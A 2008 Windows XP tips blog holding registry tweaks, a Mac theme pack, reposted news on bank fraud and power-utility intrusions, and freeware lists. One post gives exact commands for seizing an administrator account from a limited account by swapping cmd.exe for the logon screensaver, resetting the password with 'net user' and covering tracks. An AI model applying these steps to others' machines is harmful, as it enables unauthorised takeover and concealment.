Sunday, December 21, 2008

“Convert your PC into a Mac with this original visual theme”

flyakiteOSX is a transformation pack. It will transform the look of an ordinary Windows XP+ system to resemble the look of Mac OS X. The installer simply automates the process of replacing critical system files, setting registry tweaks, and installing extras such as cursors, sounds, visual styles, etc.

In case you are not happy with the results of FlyakiteOSX, everything is completely removable. Just run the uninstaller from the Start Menu or from Add/Remove Programs. FlyakiteOSX does not contain any spyware or ad-ware of any kind. All files needed for FlyakiteOSX are stored in the Windows directory in a folder named 'FlyakiteOSX' that is hidden by default.

download from here

http://flyakiteosx.en.softonic.com/


Friday, February 22, 2008

restoring win XP admin password

If you looking for restoring win XP admin password: visit: http://home.eunet.no/~pnordahl/ntpasswd/

Speed up Internet Explorer 6 Favorites

For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works

Create a Shortcut to Lock Your Computer

Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

Speeding Up Share Viewing:

This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!

Automatically Kill Programs At Shutdown:

don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.

Increasing options in add/remove programs:

Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:
[Components]NtComponents=ntoc.dll,NtOcSetupProc,,4WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7Display=desk.cpl,DisplayOcSetupProc,,7Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7iis=iis.dll,OcEntry,iis.inf,,7com=comsetup.dll,OcEntry,comnt5.inf,hide,7dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6ims=imsinsnt.dll,OcEntry,ims.inf,,7fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7
This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
To this:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7
Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".

Automatic Administrator Login:

Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.REGEDIT 4[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]"AutoAdminLogon"="1"

Registry Hacking Display legal notice on startup:

Display legal notice on startup:Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.REGEDIT[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]"legalnoticecaption"="enter your notice caption""legalnoticetext"="enter your legal notice text"

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly:
cd\ *drops to root

cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos


Now what you have just done is told the computer to backup the command programand the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Wednesday, January 23, 2008

CHOR : Bulgarian Hackers Drawn $400,000 from US Bank Accounts

http://internationa l.ibox.bg/ news/id_20985964 61

A criminal group have drawn more than 400,000 USD from bank accounts and credit cards of American citizens.

The group have been caught out in a common action of Varna Police Service and 'Secret Services'.

The group leader is the 27 year old Isa Ahmed, famous as The Hacker.

The criminal group strikes from the beginning of 2006, as they used several different ways to draw the Americans' money.

At the beginning they used to draw up to 20 dollars from thousands bank accounts. The money have been moved to virtual accounts of Bulgarian citizens and afterwards drawn out in USA again.

In the end of 2006 the group changes its tactics and starts to draw enormous amounts of 100,000 dollars.

In this way they have drawn 400,000 dollars, as according to police data the whole sum reaches 4 million dollars.

ATTACKED : Hackers Have Attacked Power Utilities - CIA

http://www.washingt onpost.com/ wp-dyn/content/ article/2008/ 01/18/AR20080118 03277.html? hpid=moreheadlin es

In a rare public warning to the power and utility industry, a CIA analyst this week said cyber attackers have hacked into the computer systems of utility companies outside the United States and made demands, in at least one case causing a power outage that affected multiple cities.

"We do not know who executed these attacks or why, but all involved intrusions through the Internet," Tom Donahue, the CIA's top cybersecurity analyst, said Wednesday at a trade conference in New Orleans.

Donahue's comments were "designed to highlight to the audience the challenges posed by potential cyber intrusions," CIA spokesman George Little said. The audience was made up of 300 U.S. and international security officials from the government and from electric, water, oil and gas companies, including BP, Chevron and the Southern Co.

"We suspect, but cannot confirm, that some of the attackers had the benefit of inside knowledge," Donahue said. He did not specify where or when the attacks took place, their duration or the amount of money demanded. Little said the agency would not comment further.

The remarks come as cyber attackers have made increasingly sophisticated intrusions into corporate computer systems, costing companies worldwide more than $20 billion each year, according to some estimates.

Cyber extortion is a growing threat in the United States, and attackers have radically increased their take from online gambling sites, e-commerce sites and banks, which pay the money to prevent sites from being shut down and to keep the public from knowing their sites have been penetrated, said Alan Paller, research director at the SANS Institute, the cybersecurity education group that sponsored the meeting.

"The CIA wouldn't have changed its policy on disclosure if it wasn't important," Paller said. "Donahue wouldn't have said it publicly if he didn't think the threat was very large and that companies needed to fix things right now."

Over the past year to 18 months, there has been "a huge increase in focused attacks on our national infrastructure networks, . . . and they have been coming from outside the United States," said Ralph Logan, principal of the Logan Group, a cybersecurity firm.

It is difficult to track the sources of such attacks, because they are usually made by people who have disguised themselves by worming into three or four other computer networks, Logan said. He said he thinks the attacks were launched from computers belonging to foreign governments or militaries, not terrorist groups.

Over the past 10 years, electric utilities, pipelines, railroads and oil companies have used remotely controlled and monitored valves, switches and other mechanisms. This has resulted in substantial savings in man power and other costs.

But to do that, the companies have installed wireless Internet connections to link the devices to central offices.

"In the past, if they wanted to go out and read a gauge on a gas well, for example, they would have to send a technician in his vehicle; he would drive 100 miles and physically read the gauge and get back in his truck," Logan said. "Now they can read it from headquarters. But it allows attackers a gateway into the system."

In addition, within the companies' main offices, control equipment can be accessed from more computers than in the past.

The electric utility industry has also been adding software that allows more coordination among different parts of the electricity grid and will ultimately allow utilities and individuals to control devices remotely. This is a central part of what many firms call the "utility of the future," which will be better able to save energy and reduce greenhouse gas emissions.

"Often there are authentication methods that are less than secure," Logan said. "Sometimes there are no authentication methods."

On Thursday, the Federal Energy Regulatory Commission approved eight cybersecurity standards for electric utilities. They involve identity controls, training, security "perimeters, " physical security of critical cyber equipment, incident reporting and recovery.

The U.S. electricity grid has always been vulnerable to outages. "Cybersecurity is a different kind of threat, however," Joseph T. Kelliher, the commission's chairman, said in a statement this week. "This threat is a conscious threat posed by a single hacker, or even an organized group that may be deliberately trying to disrupt the grid."

REACT : US Gov Implements Updates To Cyber Security Standards

http://mashable. com/2008/ 01/19/us- gov-implements- updates-to- cyber-security- standards/

Cyber security is pretty important these days. Hack attacks can be very disruptive. Just ask Romania.

So we here in the US should feel at least somewhat more secure in knowing that the Federal Energy Regulatory Commission has approved “eight new mandatory critical infrastructure protection (CIP) reliability standards to protect the nation’s bulk power system against potential disruptions from cyber security breaches.”

Now, rogue infiltrations of our power grid here in the States perhaps aren’t the worst possible events that could befall us. One can likely think of more critical (but far less likely) assaults that would necessitate more immediate remedies and responses.

But if we’re to think very selfishly of any potential losses in the face of electronic silence (imagine a prolonged moment spent without Mashable by your side), it’s natural for one to want those watts coming in through the holes in the wall without any interruptions.

So regardless of what one can presume to be FERC’s logical inability to absolutely guarantee total protection of our collective, dirty, coal-fired Web fetish, we should show our appreciation for this bit of news and get back to our regularly-scheduled feed reading, happily oblivious to any chaos that may or may not occur at the backend.

Click & Download TOP useful Freeware software for Security,Network,Servers,P2P [ this is sharing files on your computer with someone else]

Security

AVG Free - antivirus
Avast Home Free - antivirus
AntiVir PersonalEdition - antivirus
BitDefender Free - antivirus
ClamWin - antivirus
CyberDifender - Internet Security Suite
Ad-aware - anti-spyware
Spybot: Search & Destroy - anti-spyware
Windows Defender - anti-spyware
SpywareBlaster - anti-spyware
Spyware Terminator - anti-spyware
Tootkit Reveaker - rootkit detection utility
Winpooch - system protection
HiJack Free - system protection
HighJackThis - hijackers detector and remover
Kerio Personal Firewall - firewall
Sygate Personal Firewall - firewall
ZoneAlarm - firewall
AxCrypt - file encryption
Simple File Shredder - securely delete files
PuTTy - SSH client
KeePass - password manager
LockNote - password manager
nPassword - password manager
Microsoft Baseline Security Analyzer - identify security misconfigurations

Network

Hamachi - VPN client
RealVNC - remote control
UltraVNC - remote control
Ethereal - local area network administration
The Dude - network administration
Wireshark - network administration
Angry IP Scanner - IP scanner
IP-Tools - IP scanner
Free Port Scanner - IP scanner
NetMeter - network bandwidth monitoring

Servers

FileZilla - FTP client
FileZilla Server - FTP server
EFTP - FTP client/server
XAMPP - integrated server package of Apache, mySQL, PHP and Perl
WAMP - Apache, PHP5 and MySQL server

P2P this is sharing files on your computer with someone else.

?Torrent - torrent client
Azureus - torrent client
BitComet - torrent client
ABC - torrent client
BitTornado - torrent client
eMule - p2p client
SoulSeek - p2p client
Shareaza - p2p client
DC++ - Direct Connect network client
PeerGuardian - IP blocker

Click & Download Office Archive managers Internet Chat Freeware software

Office

OpenOffice - office suite
PC Suite 602 - office suite
AbiWord - text editor
Atlantis Nova - text editor
Microsoft PowerPoint Viewer - power point files viewer
Adobe Reader - pdf reader
Foxit PDF Reader - pdf reader
PDFCreator - create pdf documents
Doc Convertor - document convertor
Convert - unit convertor
Converber - unit convertor
Sunbird - calendar/organizer
EssentialPIM Free - calendar/organizer
PhraseExpress - speed up your writing
ATnotes - create notes on the desktop

Archive managers

7-Zip - compression program
IZArc - compression program
TugZIP - compression program
CabPack - compression program
Universal Extractor - extract files from any type of archive

Internet

Firefox - web browser
Internet Explorer- web browser
Maxthon - web browser
Opera - web browser
Avant Browser - web browser
Thunderbird - email client
PopTray - check for emails
Free Download Manager - download manager
FlashGet - download manager
WellGet - download manager
Download Master - download manager
WGET - commandline download manager
HTTrack - offline browser
WebReaper - offline browser
Yeah Reader - RSS reader
GreatNews - RSS reader
RSSOwl - RSS reader

Chat

Miranda - chat client
MSN Messenger - chat client
Yahoo Messenger - chat client
QIP - chat client
Gaim - chat client
JAJC - chat client
HydraIRC - IRC client
Talkative IRC - IRC client
IceChat - IRC client
Skype - VOIP client
Google Talk - VOIP client
VoipStunt - VOIP client
Gizmo - VOIP client
Wengo - VOIP client

Click & Download Audio Video Image 3D Freeware softwares

Audio

Foobar2000 - audio player
WinAmp - audio player
1by1 - audio player
JetAudio - audio player
XMPlay - audio player
Xion - audio player
Apollo - audio player
MediaMonkey - music organizer
The GodFather - music organizer
dBpowerAMP - audio converter
Audacity - audio converter
WavePad - audio converter
Kristal Audio Engine - audio editor
Exact Audio Copy - CD ripper
Audiograbber - CD ripper
CDex - CD ripper
Mp3 Tag Tools - tag editor
Mp3tag - tag editor
Taggin? MP3 - tag editor
Monkey?s Audio - APE compressor/decompre ssor
mpTrim - mp3 editor
WavTrim - wave editor
EncSpot Basic - analyse mp3 files

Video

Windows Media Player - audio/video player
VLC - video player
Media Player Classic - video player
MV2Player - video player
CrystalPlayer 1.95 - video player
Zoom Player - video player
GOM Player - video player
viPlay - video player
DSPlayer - video player
VirtualDub - video editor
CamStudio - video screen recording
AviSplit - Avi splitter
Video mp3 Extractor - rip audio from video files
Free iPod Converter - convert all popular video formats to iPod video
MediaPortal - turning your PCinto a Media Center
The FilmMachine

Image

Gimp - image editor
PhotoFiltre - image editor
Paint.net - image editor
ArtRage - image editor
Artweaver - image editor
IrfanView - image viewer
Picasa - image viewer
XnView - image viewer
FastStone Image Viewer - image viewer
FuturixImager - image viewer
Easy Thumbnails - create thumbnails from images
JoJoThumb - create thumbnails from images
iWebAlbum - create web photo albums
JAlbum - create web photo albums
3D Box Shot Maker - design quality box shot
FastStone Capture - screen capture
WinSnap - screen capture

3D

Blender3D - 3D renderer
3Delight Free - 3D renderer
SketchUp - 3D modeling
Maya Learning Edition - 3D modeling

Click & Download Games,Wallpapers Education MiscellaneousFreeware software

Games

123 Free Solitaire - solitaire games collection
Arcade Pack - classic arcade games
Live For Speed - online racing simulator
Enigma - puzzle game
Freeciv - multiplayer strategy game
Tux Racer - race down steep, snow-covered mount?ins

Education

SpeQ Mathematics - mathematics program
Dia - diagram creation program
Google Earth - explore the world
NASA World Wind - 3D virtual globe
Celestia - explore the space
Stellarium - planetarium

Miscellaneous

nLite - Build your own custom Windows disk.
VirtualPC - create virtual machines
grabMotion - webcam capture
iDailyDiary - simple page-for-a-day diary
Pivot Stickfigure Animator - create stick-figure animations
Wink - create presentations
Scribus - professional page layout
FreeMind - mind mapping software
Windows Live Writer - WYSIWYG blog authoring

Wallpapers

Michael Swanson - 1920 x 1200; 1600 x 1200; amazing wallpapers
Mikhail Arkhipov - 1920 x 1200; 1600 x 1200; amazing wallpapers

Featured Posts

Adding Accesspolicy to KeyVault for Service Principal Using Portal and Powershell

  Scripts path : https://drive.google.com/drive/folders/1sbBpnVFgXhUIXLdf2E9heyWDeU2f9427?usp=sharing  Adding Accesspolicy to KeyVault for S...